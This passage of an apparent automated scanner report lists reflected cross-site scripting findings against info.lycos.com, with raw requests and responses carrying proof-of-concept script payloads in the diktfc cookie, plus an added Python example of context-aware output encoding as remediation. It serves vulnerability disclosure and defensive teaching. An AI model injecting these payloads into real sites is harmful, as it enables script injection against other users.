This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/privacy.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd"%3balert(1)//7b5dcd82c26; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/privacy.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd";alert(1)//7b5dcd82c26.lycos.com"
});
</script>
...[SNIP]...

1.350. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy/privacy.asp

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ccb"><script>alert(1)</script>3bab4915179 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy/privacy.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/privacy.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.351. http://info.lycos.com/safety.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /safety.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea5e"%3balert(1)//10d048cbf08 was submitted in the diktfc cookie. This input was echoed as dea5e";alert(1)//10d048cbf08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /safety.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e"%3balert(1)//10d048cbf08; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Inte
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/safety.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e";alert(1)//10d048cbf08.lycos.com"
});
</script>
...[SNIP]...

1.352. http://info.lycos.com/safety.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /safety.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79c2f"><script>alert(1)</script>32286124176 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /safety.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Inte
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/safety.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.353. http://info.lycos.com/tos-mail.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-mail.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e0f"><script>alert(1)</script>4ca13e64715 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-mail.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-mail.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.354. http://info.lycos.com/tos-mail.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-mail.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab42"%3balert(1)//34b92340f39 was submitted in the diktfc cookie. This input was echoed as 1ab42";alert(1)//34b92340f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
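Findings 1.353 and 1.354 show the same cookie value landing in two different sinks on one page: a double-quoted `src` attribute of the tracking `<img>`, and a double-quoted string literal inside the `COMSCORE.beacon({...})` script. Each context needs its own encoding, and the `";alert(1)//` payload shows why plain HTML entity encoding is not enough for the script sink. The following Python is an added example, not code from the Lycos site or from the scanner report. The PHP templates behind info.lycos.com are not on the page, so `render_vulnerable()` is a stand-in that reproduces the observed output (the raw cookie value concatenated into both sinks, with the `.lycos.com` suffix the responses show the server appending), and `render_fixed()` applies the encoding each context needs. The payload strings are the ones quoted in the report.

```python
"""Context-aware encoding for the two diktfc sinks reported in 1.353 and 1.354.

Added example, not code from the Lycos site or the scanner report.
render_vulnerable() is a stand-in for the unseen PHP template that reproduces
the observed output; render_fixed() is the hardened form.
"""
import html
import json
import re
from urllib.parse import quote

# The benign part of the diktfc cookie and the two scanner payloads, as on the page.
PREFIX = "013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A"
ATTR_PAYLOAD = 'c8e0f"><script>alert(1)</script>4ca13e64715'
JS_PAYLOAD = '1ab42";alert(1)//34b92340f39'   # %3b already decoded to ';' by the server

# An unescaped '";alert(1)//' (a preceding backslash means the quote was escaped).
_JS_BREAKOUT = re.compile(r'(?<!\\)";alert\(1\)//')


def js_string_literal(value: str) -> str:
    """Quote value as a JavaScript string literal that is safe inside a <script> block.

    json.dumps escapes the double quote and the backslash, which is what stops the
    ";alert(1)// break-out. It leaves < > & alone, so a value containing </script>
    would still end the script element; those are rewritten as \\uXXXX escapes,
    which the JavaScript engine decodes back to the same characters.
    """
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def beacon_url(path: str, c15: str) -> str:
    """First layer: build the beacon URL with every query value percent-encoded."""
    params = {"c1": "2", "c2": "6036445", "c3": "", "c4": path,
              "c5": "", "c6": "", "c15": c15, "cj": "1"}
    query = "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())
    return "http://b.scorecardresearch.com/p?" + query


def attribute_value(url: str) -> str:
    """Second layer: make the URL safe inside a double-quoted HTML attribute."""
    return html.escape(url, quote=True)


def render_vulnerable(diktfc: str, path: str) -> str:
    """Stand-in for the observed template: the cookie value is concatenated raw."""
    c15 = diktfc + ".lycos.com"   # the responses show the server appending this suffix
    img = ('<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4='
           + path + '&amp;c5=&amp;c6=&amp;c15=' + c15 + '&amp;cj=1" alt="tracker" />')
    script = ('<script type="text/javascript">\nCOMSCORE.beacon({\nc4:"' + path
              + '",\nc15:"' + c15 + '"\n});\n</script>')
    return img + "\n" + script


def render_fixed(diktfc: str, path: str) -> str:
    """Same markup, with each sink encoded for its own context."""
    c15 = diktfc + ".lycos.com"
    img = '<img src="' + attribute_value(beacon_url(path, c15)) + '" alt="tracker" />'
    script = ('<script type="text/javascript">\nCOMSCORE.beacon({\nc4:' + js_string_literal(path)
              + ',\nc15:' + js_string_literal(c15) + '\n});\n</script>')
    return img + "\n" + script


def injected_script_present(page: str) -> bool:
    """True if either payload reached the page in an executable form."""
    return "<script>alert(1)</script>" in page or _JS_BREAKOUT.search(page) is not None


if __name__ == "__main__":
    for payload in (ATTR_PAYLOAD, JS_PAYLOAD):
        for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
            page = render(PREFIX + payload, "info.lycos.com/tos-mail.php")
            print(f"{name:10s} {payload[:5]}: injected={injected_script_present(page)}")
```

The attribute sink gets two layers because the value is nested in two grammars: percent-encoding makes it a safe URL query value, then entity encoding makes the URL a safe attribute value. The script sink does not go through HTML encoding at all; inside `<script>` the HTML parser does not decode entities, so `&quot;` would be passed to the JavaScript engine literally while a raw `"` still terminates the string. JSON-style escaping plus the `\u003c` rewrite handles both the string break-out and a `</script>` inside the value.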

Request

GET /tos-mail.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42"%3balert(1)//34b92340f39; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-mail.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42";alert(1)//34b92340f39.lycos.com"
});
</script>
...[SNIP]...

1.355. http://info.lycos.com/tos-po.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-po.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2aec"%3balert(1)//4b5345f7ccc was submitted in the diktfc cookie. This input was echoed as b2aec";alert(1)//4b5345f7ccc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos-po.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec"%3balert(1)//4b5345f7ccc; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Gene
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-po.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec";alert(1)//4b5345f7ccc.lycos.com"
});
</script>
...[SNIP]...

1.356. http://info.lycos.com/tos-po.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-po.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d9f"><script>alert(1)</script>c04828e62ab was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-po.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Gene
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-po.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.357. http://info.lycos.com/tos-subs.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-subs.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f28"%3balert(1)//65e76e87880 was submitted in the diktfc cookie. This input was echoed as 28f28";alert(1)//65e76e87880 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos-subs.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28"%3balert(1)//65e76e87880; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Subs
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-subs.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28";alert(1)//65e76e87880.lycos.com"
});
</script>
...[SNIP]...

1.358. http://info.lycos.com/tos-subs.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-subs.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c1"><script>alert(1)</script>eb4451887f8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-subs.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Subs
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-subs.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.359. http://info.lycos.com/tos-tm.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-tm.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdeb"><script>alert(1)</script>02352f01be0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-tm.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
